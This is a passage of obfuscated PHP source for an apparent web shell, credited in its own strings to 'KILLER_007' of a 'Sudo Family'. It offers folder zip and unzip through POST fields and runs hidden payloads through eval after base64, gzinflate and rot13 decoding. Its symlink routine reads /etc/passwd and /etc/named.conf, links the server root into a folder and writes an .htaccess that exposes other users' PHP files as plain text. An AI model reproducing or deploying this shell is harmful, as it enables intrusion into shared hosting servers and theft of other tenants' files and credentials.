"\x3c\x2f\164\144\76\74\164\x64\76\x3c\x68\x32\76\x5a\x69\x70\x20\x42\141\143\x6b\165\160\x3c\x2f\150\62\76\74\x66\x6f\x72\x6d\40\141\143\x74\151\157\x6e\x3d\47\47\x20\155\145\164\150\x6f\144\x3d\47\x70\x6f\x73\164\x27\76\x3c\146\x6f\156\x74\40\163\x74\x79\x6c\x65\75\x27\x74\145\170\x74\55\x64\x65\143\157\x72\x61\164\151\157\x6e\72\40\165\156\x64\x65\x72\154\151\x6e\x65\x3b\47\76\106\x6f\154\144\x65\x72\x3a\x3c\57\x66\x6f\156\x74\x3e\74\x62\162\76\74\151\156\160\165\164\x20\164\171\x70\145\75\47\x74\145\170\x74\x27\40\x6e\x61\x6d\145\x3d\47\144\151\x72\47\40\166\141\154\165\x65\x3d\x27{$dir}\x27\40\x73\x74\x79\x6c\145\75\47\167\151\x64\164\150\72\40\x34\65\x30\160\170\73\47\x20\150\x65\x69\x67\150\x74\x3d\x27\61\x30\47\x3e\74\x62\162\x3e\x3c\x66\x6f\156\164\x20\163\164\171\x6c\x65\x3d\x27\164\x65\x78\x74\x2d\144\145\143\157\162\x61\164\151\157\156\72\40\165\156\x64\x65\x72\154\x69\156\x65\73\x27\76\123\x61\166\145\40\x54\x6f\x3a\74\x2f\146\x6f\156\164\x3e\x3c\142\162\x3e\74\151\156\160\x75\164\40\164\x79\160\145\x3d\47\x74\145\170\164\x27\x20\x6e\x61\x6d\145\75\47\x73\x61\166\145\47\x20\166\x61\154\165\x65\75\47{$dir}\57\143\157\170\137\x62\141\x63\x6b\165\160\x2e\x7a\151\160\x27\x20\x73\x74\x79\154\x65\x3d\x27\167\151\x64\x74\150\72\40\64\x35\x30\160\x78\x3b\47\x20\x68\145\151\147\150\164\x3d\47\x31\60\x27\x3e\74\142\x72\x3e\74\151\x6e\x70\165\164\x20\x74\171\160\x65\75\x27\163\x75\142\155\x69\164\x27\40\x6e\x61\x6d\x65\75\x27\142\141\143\153\165\160\x27\x20\x76\141\154\165\145\x3d\x27\x42\x61\143\153\125\160\41\47\x20\x73\164\171\x6c\145\x3d\x27\x77\x69\x64\164\150\x3a\x20\62\x31\65\160\x78\73\x27\x3e\x3c\57\x66\x6f\x72\155\76"; if ($_POST["\x62\x61\143\153\165\160"]) { $save = $_POST["\x73\x61\166\x65"]; function Zip($source, $destination) { if (extension_loaded("\172\x69\x70") === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . "\x2f", '', $file . "\57")); } else { if (is_file($file) === true) { $zip->addFromString(str_replace($source . "\57", '', $file), file_get_contents($file)); } } } } else { if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } } return $zip->close(); } } return false; } Zip($_POST["\x64\x69\x72"], $save); echo "\x44\157\x6e\145\x20\54\x20\x53\x61\166\145\x20\x54\x6f\40\x3c\x62\x3e{$save}\74\x2f\x62\76"; } echo "\74\57\164\x64\76\74\164\144\x3e\x3c\x68\x32\76\125\156\172\151\x70\40\x4d\x61\156\x75\141\154\x3c\x2f\x68\62\76\x3c\146\x6f\x72\155\40\x61\x63\164\151\x6f\156\x3d\47\x27\x20\155\145\164\150\157\144\x3d\47\x70\157\x73\x74\x27\x3e\x3c\146\x6f\x6e\164\x20\x73\164\x79\x6c\145\x3d\x27\164\145\x78\x74\55\144\x65\143\x6f\162\x61\164\x69\x6f\156\x3a\x20\x75\x6e\144\145\162\154\x69\156\145\x3b\x27\x3e\x5a\x69\160\40\114\157\x63\141\x74\151\x6f\x6e\x3a\74\57\x66\x6f\156\x74\x3e\74\x62\x72\x3e\74\x69\x6e\160\165\x74\40\164\x79\x70\x65\x3d\x27\x74\x65\x78\x74\x27\40\156\x61\x6d\x65\x3d\x27\x64\x69\162\47\40\x76\141\154\x75\x65\x3d\x27{$dir}\57\x66\x69\x6c\145\x2e\172\x69\160\x27\x20\x73\x74\x79\x6c\x65\75\47\167\151\x64\x74\150\x3a\40\x34\x35\x30\x70\x78\x3b\x27\40\x68\x65\x69\x67\x68\164\75\x27\61\x30\47\x3e\x3c\142\x72\76\x3c\146\x6f\156\164\x20\163\164\x79\x6c\x65\75\47\164\x65\170\164\55\x64\145\143\x6f\x72\141\164\151\157\x6e\72\40\165\156\144\x65\162\154\151\156\x65\73\47\x3e\123\141\x76\145\x20\124\157\72\x3c\x2f\146\157\x6e\164\x3e\74\x62\x72\76\x3c\151\x6e\160\165\164\x20\164\171\160\x65\75\47\x74\x65\x78\164\x27\40\156\x61\155\145\75\47\163\x61\x76\x65\x27\40\166\x61\x6c\165\145\x3d\x27{$dir}\57\143\157\x78\137\165\x6e\x7a\151\x70\47\40\x73\x74\171\x6c\145\75\x27\x77\x69\144\164\x68\72\40\64\65\60\x70\170\x3b\47\40\150\145\151\x67\150\x74\75\x27\61\60\x27\76\x3c\x62\x72\x3e\74\151\156\160\x75\164\x20\164\171\x70\x65\75\47\x73\165\x62\155\x69\164\x27\x20\x6e\x61\155\x65\75\x27\145\170\x74\x72\141\x6b\x27\x20\166\x61\154\165\x65\x3d\47\125\x6e\x7a\151\x70\x21\x27\x20\x73\164\x79\154\x65\x3d\x27\x77\x69\144\x74\x68\72\x20\x32\x31\x35\160\170\73\47\76\x3c\x2f\146\x6f\162\155\x3e"; if ($_POST["\145\170\x74\x72\141\x6b"]) { $save = $_POST["\163\141\166\145"]; $zip = new ZipArchive(); $res = $zip->open($_POST["\144\151\x72"]); if ($res === TRUE) { $zip->extractTo($save); $zip->close(); echo "\x53\165\x63\143\x65\x73\40\54\40\114\157\143\x61\164\151\157\x6e\x20\72\40\x3c\x62\x3e" . $save . "\74\x2f\x62\x3e"; } else { echo "\107\x61\x67\141\x6c\x20\115\141\x73\40\72\50\x20\x4e\164\141\150\154\x61\x68\x20\x21"; } } echo "\74\x2f\164\162\x3e\74\57\x74\x61\x62\154\145\76"; } elseif ($_GET["\144\157"] == "\x73\x68\145\154\154\143\150\153") { eval(str_rot13(gzinflate(str_rot13(base64_decode("\x76\125\144\144\121\164\x73\x77\x46\x48\x31\145\x70\146\64\x48\143\103\105\61\x56\125\170\142\116\x76\105\167\144\x53\x4d\107\x64\x39\x46\x65\112\164\107\x68\x50\x61\171\x67\x79\114\x5a\x35\x42\66\x6a\x63\65\x41\141\110\x4f\122\x50\57\146\144\146\65\x49\x6f\130\x78\163\102\x65\151\x53\x62\x47\144\x5a\165\64\71\61\x7a\66\x2b\143\124\x69\x41\61\x47\126\120\144\x43\153\167\x44\x54\x49\x61\x44\x6e\x4d\x35\x6c\x79\x56\165\x70\x6f\124\65\116\x63\x31\171\x6d\x57\127\x6d\x57\160\132\144\122\155\71\x46\x58\x57\x4f\107\161\x7a\147\165\x54\x6c\x75\145\64\x55\164\x6a\160\x61\x2b\160\x35\x33\x61\x34\x31\x31\x4f\x43\111\x63\x4b\x5a\106\x43\170\161\107\126\x55\105\123\66\x33\x46\x38\x58\x47\x53\x79\x6c\x41\170\63\x6a\x72\x2b\x6f\101\x54\130\x34\x35\123\130\105\63\114\102\165\142\107\167\x41\163\x4d\61\x36\122\114\x70\x59\65\x4a\154\160\x2b\141\110\150\61\122\122\x38\152\x73\x63\127\141\x50\x5a\160\111\x30\x64\172\142\x61\x79\x2f\150\x64\x5a\x4a\112\x71\153\172\151\151\x46\x55\132\x56\65\164\x35\157\x68\123\155\x49\x45\x31\x50\x4f\x79\60\x4d\x2b\x42\x6c\53\x33\70\x31\162\x6a\105\x4c\61\x77\x68\152\65\170\155\150\x2f\153\167\166\x43\70\65\157\151\x66\104\x54\x70\x36\167\161\x6c\x58\x79\x41\x44\x72\x32\x79\156\101\112\x4b\112\x67\x70\x69\x45\x61\x65\x54\x72\103\x76\114\x61\x44\111\x41\57\x4a\60\x4f\103\x44\64\67\106\163\167\123\x36\x59\151\x38\65\x70\x45\172\172\x72\x59\126\x6f\116\106\62\165\x6a\105\147\60\117\x58\x30\152\x4a\x31\144\165\166\x70\x57\x6c\127\53\150\x4f\122\155\x68\170\121\111\x45\154\x4e\x76\120\x75\x53\57\151\156\x42\153\x73\x78\x45\x41\71\70\x4a\163\x4e\x61\x50\x6a\122\111\x69\x55\x39\x63\151\x76\152\x32\x46\160\131\x4c\65\x6a\150\x45\154\167\x57\x64\116\x38\x4b\x6d\125\123\x5a\x33\x66\155\x35\116\x4e\x6e\62\160\126\x46\115\x57\x49\114\123\110\125\165\120\x54\106\x65\x72\x68\142\146\123\131\x73\61\x58\x61\170\53\x6e\x56\62\163\64\165\53\x58\154\x34\x73\154\x65\147\x4e\111\66\115\x63\x6b\x57\102\x78\x76\144\155\x69\x55\170\66\123\x52\x57\110\x55\x66\164\117\x58\x5a\x35\x6a\127\155\104\x2f\107\x69\71\161\x41\x55\x62\144\115\126\x76\113\x50\113\x50\66\x65\154\113\126\x78\101\61\121\x61\x79\111\162\x57\156\x47\63\101\x35\71\x79\66\151\142\x69\115\x6a\162\104\115\x64\x39\117\x49\x2b\x39\125\146\143\x79\x55\71\121\x73\166\102\63\x57\x35\x56\167\x54\x34\x65\104\x48\x61\x6d\x35\x78\x63\x38\65\106\x38\x41\103\x64\x34\60\161\x33\x45\x76\x66\x65\115\x78\x41\104\x65\x33\110\x7a\141\x74\147\x41\143\x4c\x44\65\70\101\150\x77\x59\x4e\x6f\171\117\x78\112\104\x76\x71\143\x35\160\131\x68\150\162\117\110\103\117\x38\131\60\71\x37\156\130\x4d\66\x76\x4a\x41\x43\x4c\146\166\103\105\143\x74\66\111\x57\141\115\146\x47\170\152\65\x56\x58\117\x47\x53\167\x6b\x35\117\x70\x61\x69\x34\112\65\156\67\x32\147\x6a\x30\x57\146\172\141\x2b\163\115\x2b\x78\x32\x39\x2b\104\x36\x62\122\x35\x65\x46\x57\141\x4b\62\x78\x43\x63\x43\x51\x63\x45\114\102\x78\171\x39\131\70\104\x62\117\x6a\x46\x59\62\156\106\x32\x36\x4a\152\106\x38\x38\x6c\103\63\x7a\155\131\132\x48\x45\x4a\x38\150\x59\153\124\x46\x61\112\x46\164\x70\67\x6a\63\x64\160\172\x50\x76\146\144\x4b\170\x5a\113\131\170\x39\152\x31\103\127\153\106\112\x66\x75\123\142\x76\132\x4d\x7a\104\x41\146\x37\x38\115\x52\x64\130\147\x51\67\x32\64\x2f\117\x7a\x35\143\126\x74\x52\67\x64\101\x37\102\x4b\x39\65\x6f\127\71\124\166\x58\66\x69\144\x38\162\162\x4c\131\150\x59\x49\141\x75\160\172\123\x45\161\x6e\164\x74\150\x70\110\123\x65\131\113\x32\x61\x58\155\x66\x59\105\127\x4c\x78\x71\x6f\152\x47\153\x6a\110\63\x6d\x52\112\x63\x72\x79\161\x67\x65\x31\x75\x4e\66\103\x76\x59\x76\x67\x62\114\x5a\144\112\x4a\120\161\x50\x69\71\x32\x38\155\154\62\166\116\x71\110\x64\53\x79\x55\64\x51\66\142\x6f\164\164\x68\151\104\x73\x49\x2f\x2f\x41\x55\75"))))); } elseif ($_GET["\x64\x6f"] == "\x6c\x6f\147\150\165\x6e\164\x65\162") { eval(str_rot13(gzinflate(str_rot13(base64_decode("\164\125\x6c\x37\131\164\160\126\x45\120\70\67\126\x58\x79\x48\151\x5a\115\x72\60\x42\114\x73\120\x4a\161\x71\147\112\x31\x34\x51\171\102\161\165\x75\116\162\x58\105\x55\x6c\105\105\x78\145\145\x4c\62\105\x35\150\132\67\167\123\x35\160\x6d\165\71\x2b\x73\67\132\x57\x67\104\x4d\65\122\103\155\x57\112\130\164\x30\x66\67\x50\x7a\x33\112\156\112\65\x32\154\x70\x68\117\163\124\121\x2b\157\x64\142\x6a\106\x4f\x6a\x61\x47\154\61\x43\103\x66\127\x49\154\107\124\x79\x50\147\x4c\147\x75\111\x70\x51\53\126\157\121\x4b\x52\131\104\x37\x78\x38\x4e\70\x6d\104\x68\163\x71\x43\x2f\151\132\x52\112\x39\x44\x6f\170\164\104\x71\116\131\x44\x79\x78\64\170\131\101\53\x32\x30\x42\125\x6d\x76\152\x45\x46\67\155\167\x34\x77\x6c\x4c\71\x57\132\x38\112\x35\157\x36\x39\142\x36\x6c\160\x63\x79\150\x67\x38\121\151\x70\152\165\53\x61\130\x6b\x41\x56\x6f\x33\x35\172\53\57\141\172\65\x4b\126\107\x68\x6f\x6f\172\x6d\154\105\x42\151\154\150\x4c\154\x74\x62\x4a\171\x56\x43\x6c\66\127\x55\x4c\166\160\x44\170\67\x6b\116\105\61\61\x6c\x44\160\121\61\x34\116\112\163\x4b\131\71\x68\x51\113\105\171\x6c\151\x67\x63\x38\104\110\x4e\112\x46\125\70\170\143\x72\130\x55\113\x67\122\x47\x56\66\x68\127\150\x56\157\x6f\103\x36\x78\115\122\x43\163\150\x52\x48\62\x66\x7a\63\61\117\x4c\x51\x43\x66\113\164\171\121\x47\x56\x79\x4e\x70\117\117\x67\53\x44\x66\x6c\105\53\150\123\x50\x41\150\131\x2b\x56\x79\x58\163\x78\122\154\132\66\x70\x33\x78\53\161\122\141\x57\163\x4b\62\163\146\x71\170\63\102\x31\63\117\x5a\155\116\64\x45\61\x51\162\x5a\x39\x78\x75\x79\161\161\x6b\x47\65\113\171\x61\x45\x7a\103\163\165\x69\x64\124\112\x64\146\142\112\105\x57\x45\107\x7a\117\131\117\x45\65\x50\x41\151\x6d\x34\152\61\x66\105\112\x2f\145\123\117\x53\172\x37\x58\110\155\x35\143\x71\x46\105\x32\156\x33\142\x76\61\x58\167\117\x34\152\145\x59\106\166\x66\116\170\155\x79\172\x4e\x53\147\x6b\162\x69\x76\143\154\122\67\x7a\165\145\156\x49\151\154\x41\114\152\106\122\160\x45\115\x36\65\x53\116\172\x48\x59\62\x41\60\156\x47\x75\x62\x51\x38\106\144\166\53\x69\147\132\x70\110\x32\163\147\x66\143\101\142\154\101\x4f\66\126\160\x6a\x38\154\125\x50\x6b\125\121\x59\145\x7a\x71\150\x56\143\102\63\162\62\x44\x78\141\x4a\106\x4b\114\x32\101\x6c\x76\104\171\x6b\x52\152\x51\142\x6d\122\164\160\130\164\x39\x30\x65\x75\x30\x7a\x69\x2f\x2b\x4d\112\x75\71\x55\57\x75\x69\x6a\142\x38\126\165\125\x78\142\x63\154\102\x45\x73\102\163\x34\65\x6b\x2b\172\x6b\160\x53\63\113\x36\x69\131\x42\126\114\x46\x61\x42\171\x6c\x6e\117\x67\111\x30\150\x52\114\x35\131\63\x46\x51\x58\122\132\x66\155\x69\x59\102\x71\x45\x77\115\124\x4e\141\154\x32\101\x6b\x4c\x65\131\153\x35\71\x55\x79\141\64\113\105\x56\x67\146\170\114\x5a\150\x76\x64\62\120\x50\x39\104\152\x6a\x6d\170\x6d\53\151\x33\127\103\142\x4b\171\x44\60\x6a\155\x2f\145\x6c\171\62\142\x56\60\x6c\103\x38\x5a\162\x4d\x49\57\120\x53\103\64\x64\124\152\163\x6b\x69\153\x4f\x50\127\123\x51\113\x69\151\x52\102\154\131\x6b\62\x4b\x42\x51\114\x61\156\143\x57\x51\x51\132\120\x4b\x6a\x74\x56\x4e\142\147\x62\x78\x44\114\151\163\x4b\x39\x77\65\132\x4e\143\152\x41\106\x65\141\x34\x75\102\x57\x45\x39\x50\x39\x54\61\x61\x36\x2f\145\67\155\164\106\x78\142\x38\x59\164\111\151\x2b\123\x78\x59\167\x37\x53\70\105\x63\110\130\64\x2b\x37\x52\x38\142\126\x78\x79\x68\151\x70\113\x43\143\x54\110\111\x30\165\162\x70\x76\171\x53\x38\x69\x6a\115\x7a\x34\x73\x7a\61\x57\x68\66\107\x78\143\x4c\145\157\x48\x33\x77\x70\62\156\167\x6d\122\x2f\x38\x52\x6a\x46\x2f\x2b\x57\116\152\x39\x2b\106\x4b\x56\163\105\154\105\151\x74\x6c\x76\125\157\157\171\x39\x69\x56\71\x31\63\151\153\155\171\x6d\61\63\63\130\151\x5a\62\160\x51\142\147\x6a\x51\x55\x4a\132\x51\162\x6a\x45\105\65\x6d\x4f\62\x70\x65\122\x6a\x4c\x47\162\111\x63\x30\105\166\x79\147\x62\x56\x44\x77\161\101\57\143\70\112\53\123\x4f\x4c\x7a\x42\x32\121\66\x6b\x53\112\x70\60\x4d\172\111\132\156\x53\x2b\x5a\x55\110\x63\165\121\170\x53\70\120\65\166\x54\x2f\62\x4b\x57\62\155\145\113\x52\x48\x62\145\x79\62\x44\105\156\153\x75\x74\105\165\110\145\61\x47\164\104\x42\x5a\122\115\111\66\110\104\62\106\70\x72\170\x61\x43\152\102\x6a\170\x2b\x51\124\x78\x70\x4b\x44\x66\x69\x64\122\x67\163\x4c\x58\x2f\126\x73\x4f\171\x74\x37\x4d\155\57\66\111\x6f\150\123\x74\x69\x6c\x34\x39\x75\x4b\x45\145\164\113\x76\63\x2b\67\x33\104\60\x4b\x4d\127\x44\163\x6b\63\102\x50\x30\x6a\146\111\x76\x72\125\166\157\70\131\107\62\x31\145\x33\x6f\71\x34\x2b\67\155\x6e\120\x38\x46\x58\124\131\107\x79\x71\x58\x70\x74\x4f\x57\x32\x76\x56\x42\x4e\x65\62\x6b\144\116\167\x69\132\150\x2b\x72\x2f\x4e\163\66\104\x2f\x4e\x36\x57\120\126\53\x76\162\124\x41\124\x38\x73\154\x4b\102\127\145\70\127\x76\x4c\162\x52\x45\120\x6f\x65\115\114\141\166\x37\60\x52\161\141\153\166\145\x50\67\132\x75\x76\x59\x63\144\105\x72\154\154\x5a\111\x76\x76\x4a\67\x37\x72\x67\x30\163\x4e\x6c\112\x68\152\x31\x50\156\x59\116\x43\x78\x55\x64\x43\x6d\57\x31\162\120\x4b\x36\115\x4c\102\171\113\x4b\x70\142\x41\122\111\x68\x47\x37\105\x53\66\117\x51\x6d\65\x4e\124\144\x76\x4d\x37\70\x32\66\x79\157\63\x34\110\142\x4c\x69\115\126\x6f\70\x35\x57\x41\x70\130\60\146\130\x70\x42\x6b\x77\65\x2b\114\102\x39\x43\x4e\x74\x44\x37\x68\x6b\x4c\x50\145\170\60\162\x46\121\x42\x48\x62\113\x73\65\x53\x35\x6a\x32\x6e\170\121\x56\103\x47\146\x72\130\x4e\x36\x33\145\150\x66\154\142\53\53\141\x36\62\62\110\x31\172\116\65\66\x2b\57\x71\155\71\x4f\160\115\x47\172\167\x39\157\60\x39\114\104\171\111\115\171\x64\150\x31\x43\163\165\124\x71\142\x36\154\x76\x78\x4f\x4b\x52\x36\x79\151\145\x66\142\151\113\x39\67\x63\x51\x46\64\x6c\x72\145\x34\57\151\x64\101\x52\x47\144\x61\x75\152\x6d\x44\x72\x35\x58\166\x70\170\x50\x51\x58\120\57\147\165\x5a\x43\63\x6d\165\x33\x47\143\170\x67\107\166\106\x69\x4d\127\x52\152\x44\62\152\166\x58\x42\141\x33\x62\x69\172\53\x64\160\57\x67\125\75"))))); } elseif ($_GET["\x64\x6f"] == "\x6d\145\164\165") { echo "\74\x66\157\162\x6d\40\141\143\164\x69\157\156\75\42\77\144\151\x72\75\x24\144\x69\162\46\x64\x6f\x3d\155\x65\164\x75\42\x20\x6d\145\164\150\x6f\x64\x3d\42\x70\157\x73\x74\x22\x3e"; unset($_SESSION[md5($_SERVER["\x48\x54\x54\120\137\x48\117\x53\124"])]); echo "\102\x79\x65\x65\x20\41"; } elseif ($_GET["\x64\157"] == "\x61\x62\x6f\165\x74") { echo "\x3c\x63\x65\x6e\164\x65\162\76\x53\x75\104\x30\x20\127\145\142\x20\123\150\145\x6c\154\x3c\150\x72\x3e\112\x75\163\164\40\x53\x68\145\154\154\40\x42\171\40\113\111\114\114\x45\122\x5f\60\60\67\40\x2d\76\40\115\145\x6d\x62\145\162\40\x6f\146\x20\123\x75\x64\x6f\40\x46\141\155\151\154\x79\40"; } elseif ($_GET["\144\157"] == "\x73\x79\155\154\151\156\153") { $full = str_replace($_SERVER["\x44\x4f\x43\125\x4d\x45\116\x54\x5f\122\x4f\x4f\124"], '', $dir); $d0mains = @file("\57\x65\x74\143\57\156\x61\155\x65\144\56\143\157\156\x66"); if ($d0mains) { @mkdir("\x63\x6f\x78\137\x73\171\x6d", 511); @chdir("\x63\x6f\170\137\x73\x79\155"); @exe("\x6c\x6e\40\x2d\x73\x20\57\x20\x72\157\x6f\164"); $file3 = "\x4f\x70\164\x69\x6f\x6e\x73\x20\111\156\x64\x65\x78\x65\x73\x20\x46\157\154\154\157\x77\123\171\x6d\114\151\x6e\153\x73\xa\104\151\x72\145\143\x74\x6f\162\x79\x49\156\x64\x65\170\40\x6a\x61\156\143\x6f\170\56\150\164\155\12\101\144\144\124\171\x70\145\40\x74\x65\x78\x74\57\160\154\141\151\x6e\x20\56\x70\x68\x70\x20\xa\x41\144\x64\110\x61\156\x64\154\x65\x72\x20\x74\x65\170\164\x2f\x70\154\141\x69\x6e\x20\x2e\160\x68\160\12\x53\x61\x74\x69\x73\x66\x79\x20\x41\x6e\x79"; $fp3 = fopen("\x2e\x68\x74\x61\x63\x63\145\x73\163", "\167"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\12\74\x74\141\142\154\x65\x20\x61\154\x69\147\156\75\143\x65\x6e\x74\145\162\40\142\x6f\162\x64\x65\162\75\x31\40\x73\164\x79\154\145\75\x27\167\x69\x64\164\150\72\66\60\45\x3b\142\x6f\162\x64\145\162\x2d\x63\157\154\x6f\162\72\x23\x33\63\63\63\63\63\73\x27\76\12\x3c\x74\162\x3e\xa\x3c\x74\x64\40\x61\x6c\x69\x67\156\75\x63\x65\156\164\145\x72\76\74\146\157\x6e\x74\40\163\x69\172\145\75\x32\76\123\56\x20\116\x6f\x2e\74\x2f\x66\157\156\164\76\x3c\57\164\x64\x3e\xa\74\164\144\x20\141\154\151\147\x6e\75\x63\145\x6e\x74\145\162\x3e\x3c\146\x6f\156\x74\40\x73\x69\172\145\75\62\x3e\104\x6f\155\141\151\156\163\x3c\57\146\x6f\x6e\x74\x3e\x3c\x2f\164\x64\x3e\xa\x3c\164\144\40\141\154\151\147\156\75\143\x65\x6e\x74\145\162\76\x3c\146\157\156\x74\x20\163\151\172\145\x3d\62\x3e\x55\x73\145\162\x73\x3c\57\146\x6f\x6e\164\x3e\74\57\x74\x64\x3e\12\x3c\x74\144\x20\x61\x6c\x69\147\x6e\75\143\x65\x6e\x74\145\162\x3e\x3c\146\157\x6e\x74\x20\x73\151\172\145\75\x32\76\x53\171\155\154\151\x6e\153\x3c\57\146\x6f\x6e\x74\76\x3c\x2f\164\x64\76\12\74\57\164\162\76"; $dcount = 1; foreach ($d0mains as $d0main) { if (eregi("\172\157\156\145", $d0main)) { preg_match_all("\43\172\x6f\156\x65\x20\42\x28\56\52\x29\42\x23", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("\57\x65\164\143\x2f\166\141\x6c\x69\141\x73\x65\163\x2f" . $domains[1][0])); echo "\74\164\x72\40\x61\154\151\147\156\75\x63\x65\x6e\x74\x65\162\76\74\x74\144\76\x3c\146\157\156\x74\x20\163\151\172\145\75\x32\x3e" . $dcount . "\74\x2f\146\157\x6e\164\76\74\57\x74\x64\76\xa\74\x74\144\x20\141\154\151\147\156\x3d\154\x65\146\164\76\x3c\x61\40\150\162\x65\146\x3d\150\164\164\160\72\x2f\x2f\167\x77\x77\x2e" . $domains[1][0] . "\x2f\76\x3c\146\157\x6e\164\40\x63\154\x61\x73\163\75\x74\170\x74\76" . $domains[1][0] . "\x3c\x2f\x66\157\156\164\x3e\74\57\141\76\74\57\x74\144\x3e\12\x3c\x74\x64\x3e" . $user["\156\141\x6d\145"] . "\74\x2f\164\144\76\xa\x3c\164\x64\x3e\74\x61\x20\x68\162\x65\146\x3d\47{$full}\57\143\157\x78\137\163\x79\155\57\x72\157\157\x74\57\150\x6f\x6d\145\x2f" . $user["\x6e\x61\155\145"] . "\57\160\x75\x62\154\151\143\137\x68\164\x6d\x6c\x27\40\164\x61\162\147\145\164\75\47\x5f\x62\154\141\x6e\x6b\x27\x3e\x3c\x66\x6f\156\164\40\x63\x6c\141\163\163\x3d\x74\x78\164\76\123\171\155\x6c\x69\156\x6b\x3c\x2f\x66\157\x6e\x74\x3e\x3c\x2f\141\76\74\57\x74\144\x3e\x3c\57\x74\162\x3e"; flush(); $dcount++; } } } echo "\x3c\57\164\141\142\x6c\x65\76"; } else { $TEST = @file("\57\x65\164\x63\57\160\141\x73\x73\x77\x64"); if ($TEST) { @mkdir("\143\x6f\170\x5f\x73\171\155", 511); @chdir("\143\x6f\170\x5f\x73\171\155"); exe("\x6c\156\40\x2d\163\x20\57\x20\x72\157\x6f\164"); $file3 = "\x4f\x70\164\151\157\156\163\40\111\x6e\x64\145\x78\x65\x73\40\x46\x6f\154\x6c\157\167\x53\x79\155\114\151\156\x6b\163\12\104\151\162\145\x63\164\157\162\171\x49\156\x64\x65\x78\x20\152\141\156\143\x6f\x78\56\150\164\x6d\xa\101\144\x64\x54\x79\160\x65\x20\x74\145\170\x74\57\160\x6c\x61\151\156\x20\56\160\x68\160\40\xa\101\144\144\110\141\x6e\144\x6c\x65\162\40\164\145\x78\x74\x2f\160\x6c\x61\151\156\40\56\160\x68\x70\12\123\x61\x74\151\x73\146\x79\x20\x41\x6e\x79"; $fp3 = fopen("\56\150\x74\x61\143\143\145\163\163", "\x77"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\xa\x20\x3c\x74\x61\x62\154\145\40\141\154\x69\147\156\75\143\145\x6e\164\145\162\40\142\157\x72\144\x65\162\x3d\61\x3e\x3c\x74\162\76\xa\40\x3c\164\x64\40\141\x6c\x69\147\156\x3d\143\x65\x6e\164\x65\162\76\x3c\146\x6f\156\164\x20\x73\151\x7a\x65\x3d\63\x3e\123\x2e\x20\116\157\x2e\x3c\x2f\x66\157\156\x74\x3e\74\x2f\164\x64\76\xa\40\74\x74\x64\40\x61\x6c\151\x67\x6e\x3d\143\145\x6e\x74\x65\x72\76\74\x66\x6f\x6e\164\x20\163\x69\172\145\75\63\x3e\125\x73\145\162\163\x3c\57\x66\x6f\x6e\x74\x3e\x3c\57\x74\x64\76\xa\x20\74\164\x64\40\x61\x6c\x69\x67\x6e\x3d\143\145\x6e\x74\145\162\76\x3c\x66\157\x6e\x74\40\x73\151\172\x65\75\x33\76\123\x79\155\x6c\151\x6e\x6b\x3c\57\x66\157\x6e\164\x3e\74\57\164\144\x3e\x3c\x2f\164\162\76"; $dcount = 1; $file = fopen("\57\145\x74\x63\x2f\160\141\x73\163\x77\144", "\162") or die("\125\156\x61\142\x6c\x65\40\164\x6f\40\x6f\160\145\156\x20\146\151\154\x65\41"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match("\x2f\x5c\57\x28\56\52\77\51\x5c\x3a\x5c\57\x2f\x73", $s, $matches); $matches = str_replace("\150\x6f\155\x65\57", '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "\x62\151\x6e" || $matches == "\145\x74\143\x2f\x58\x31\x31\57\x66\x73" || $matches == "\166\141\x72\x2f\154\x69\142\57\x6e\x66\x73" || $matches == "\166\141\162\x2f\x61\x72\160\x77\141\x74\x63\x68" || $matches == "\166\141\x72\x2f\147\x6f\160\150\145\x72" || $matches == "\163\x62\151\156" || $matches == "\166\141\162\57\x61\x64\x6d" || $matches == "\x75\x73\x72\57\147\x61\x6d\x65\x73" || $matches == "\x76\x61\162\57\x66\x74\160" || $matches == "\145\x74\143\x2f\156\x74\x70" || $matches == "\x76\141\162\57\x77\167\167" || $matches == "\x76\141\162\x2f\x6e\x61\x6d\x65\x64") { continue; } echo "\x3c\x74\162\x3e\74\164\x64\40\x61\x6c\151\147\x6e\x3d\143\145\x6e\x74\145\162\x3e\x3c\x66\157\156\x74\x20\x73\x69\172\145\75\62\76" . $dcount . "\x3c\x2f\164\144\x3e\xa\40\x3c\164\144\x20\141\x6c\151\x67\x6e\75\x63\145\x6e\x74\x65\x72\x3e\74\x66\x6f\x6e\164\x20\x63\x6c\141\163\x73\75\x74\x78\x74\x3e" . $matches . "\74\x2f\x74\x64\x3e"; echo "\x3c\164\x64\40\141\x6c\151\147\x6e\x3d\x63\145\156\x74\x65\162\76\x3c\x66\157\156\x74\40\143\154\141\163\x73\75\x74\170\164\76\x3c\x61\x20\150\x72\x65\146\x3d{$full}\57\143\157\x78\x5f\163\171\155\x2f\162\157\x6f\164\57\150\157\155\x65\57" . $matches . "\57\x70\165\142\154\x69\x63\137\150\164\155\154\x20\164\x61\x72\x67\145\164\75\47\x5f\x62\x6c\141\x6e\x6b\x27\76\123\x79\x6d\154\151\156\x6b\x3c\x2f\x61\x3e\74\x2f\164\144\76\x3c\57\164\162\76"; $dcount++; } fclose($file); echo "\74\57\164\x61\142\x6c\145\x3e"; } else { if ($os != "\127\151\156\x64\x6f\167\x73") { @mkdir("\x63\x6f\170\x5f\x73\x79\155", 511); @chdir("\x63\x6f\x78\137\x73\x79\155"); @exe("\x6c\x6e\40\x2d\x73\x20\57\x20\162\x6f\157\x74"); $file3 = 